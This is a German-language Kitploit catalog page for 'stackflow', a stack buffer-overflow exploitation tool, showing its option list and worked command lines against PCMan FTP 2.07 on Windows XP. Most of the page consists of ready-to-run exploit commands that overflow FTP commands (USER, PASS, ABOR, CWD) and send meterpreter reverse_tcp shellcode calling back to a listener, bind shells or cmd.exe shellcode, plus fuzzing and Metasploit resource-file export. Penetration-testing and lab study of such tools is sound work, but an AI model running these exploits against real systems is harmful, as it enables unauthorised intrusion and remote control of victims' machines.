Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
stackflow — Universelles stack-basiertes Buffer-Overflow-Exploitationstool | Kitploit
Tools/GitHubGitHub/d4rkcat/stackflow
Payload-GenerierungSchwachstellenanalyseExploitationShellcodeDebuggerFuzzingPenetrationstestsBinary-Exploitation
GitHubd4rkcat/stackflow

stackflow

Universelles stack-basiertes Buffer-Overflow-Exploitationstool

Repository anzeigen
2382vor 12 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

stackflow

Universelles stack-basiertes Buffer-Overfow-Exploitation-Tool

Usage

root@kitploit:~
usage: ./stackflow.py OPTIONS

optional arguments:
  -h, --help            show this help message and exit
  -r RHOST, --rhost RHOST
                        entfernte Hostadresse
  -p RPORT, --rport RPORT
                        entfernter Port
  -c CMDS, --cmds CMDS  an den Server zu sendende Befehle vor dem Overflow
  -v VULNCMD, --vulncmd VULNCMD
                        verwundbarer Befehl
  -o OFFSET, --offset OFFSET
                        Offset zu EIP
  -ao AUTOOFFSET, --autooffset AUTOOFFSET
                        Offset aus dem zyklischen Muster-EIP-String berechnen
  -a RETURNADD, --returnadd RETURNADD
                        Rücksprungadresse
  -n NOPS, --nops NOPS  Anzahl der voranzustellenden NOPS \x90 x 4
  -m PAYLOAD, --payload PAYLOAD
                        MSF-Payload
  -i LHOST, --lhost LHOST
                        lokale Hostadresse
  -l LPORT, --lport LPORT
                        lokaler Port
  -f FUZZ, --fuzz FUZZ  Fuzze mit zyklischem Muster der Größe
  -t, --calc            Sende calc.exe-Shellcode
  -t1, --cmdprompt      Sende cmd.exe-Shellcode
  -d, --display         Zeige den Exploit-Buffer an
  -q, --quiet           Weniger Müll anzeigen
  -w TIMEOUT, --timeout TIMEOUT
                        Timeout für Socket (Standard: 5)
  -e CFEXPORT, --cfexport CFEXPORT
                        Exploit-Konfiguration und Metasploit-RC-Datei exportieren
  -g CFIMPORT, --cfimport CFIMPORT
                        Exploit aus Konfigurationsdatei importieren und ausführen
  -s STANDALONE, --standalone STANDALONE
                        Exploit als eigenständiges Python-Skript exportieren
Tool herunterladen

Alle Optionen können über die Befehlszeile eingegeben oder aus einer Konfigurationsdatei gelesen werden.

Einige Beispiele für PCMan FTP 2.07 unter WindowsXP SP3 (ENG):

Verwundbare App: http://www.exploit-db.com/wp-content/themes/exploit/applications/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z

Exploit ohne Befehle und sende meterpreter/reverse_tcp-Shellcode, der zurück zu 192.168.0.2 auf Port 4444 ruft:

root@kitploit:~
./stackflow.py -i 192.168.0.2 -l 4444 -r 192.168.0.9 -p 21 -o 2012 -m windows/meterpreter/reverse_tcp -a 7E429353

Exploitiere den USER-Befehl und sende meterpreter/reverse_tcp-Shellcode, der zurück zu 192.168.0.2 auf Port 4444 ruft:

root@kitploit:~
./stackflow.py -i 192.168.0.2 -l 4444 -r 192.168.0.9 -p 21 -o 2007 -m windows/meterpreter/reverse_tcp -v 'USER' -a 7E429353

Exploitiere den PASS-Befehl und sende calc.exe-Shellcode:

root@kitploit:~
./stackflow.py -r 192.168.0.9 -p 21 -o 6103 -v 'PASS' -c 'USER anonymous' -a 7E429353 -t

Exploitiere den ABOR-Befehl und sende meterpreter/bind_tcp-Shellcode, der auf Port 4444 lauscht:

root@kitploit:~
./stackflow.py -r 192.168.0.9 -p 21 -o 2007 -v 'ABOR' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -l 4444 -m windows/meterpreter/bind_tcp

Exploitiere den CWD-Befehl und sende cmd.exe-Shellcode und zeige den Exploit-Buffer an:

root@kitploit:~
./stackflow.py -r 192.168.0.9 -p 21 -o 2008 -v 'CWD' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -t1 -d

Fuzze den STOR-Befehl mit einem zyklischen Buffer der Größe 3000:

root@kitploit:~
./stackflow.py -r 192.168.0.9 -p 21 -v 'STOR' -c 'USER anonymous&PASS [email protected]' -f 3000

Exploitiere den CWD-Befehl mit dem Auto-Offset-String aus dem EIP nach einem Fuzzing-Absturz und sende cmd.exe-Shellcode:

root@kitploit:~
./stackflow.py -r 192.168.0.9 -p 21 -ao o9Cp -v 'CWD' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -t1

Exportiere das Exploit-Py- und Metasploit-RC-File:

root@kitploit:~
./stackflow.py -r 192.168.0.9 -p 21 -o 2008 -v 'CWD' -c 'USER anonymous&PASS [email protected]' -a 7E429353 -e revCWD -l 4444 -m windows/meterpreter/reverse_tcp -i 192.168.0.2

Starten Sie msfconsole und führen Sie den Exploit und Handler aus:

root@kitploit:~
msfconsole -r revCWD.rc

Führen Sie den Exploit und Handler von msfconsole aus:

root@kitploit:~
resource /path/to/revCWD.rc

Führen Sie einen Exploit aus einer Konfigurationsdatei aus (kein Handler!):

root@kitploit:~
./stackflow.py -g revCWD(.py)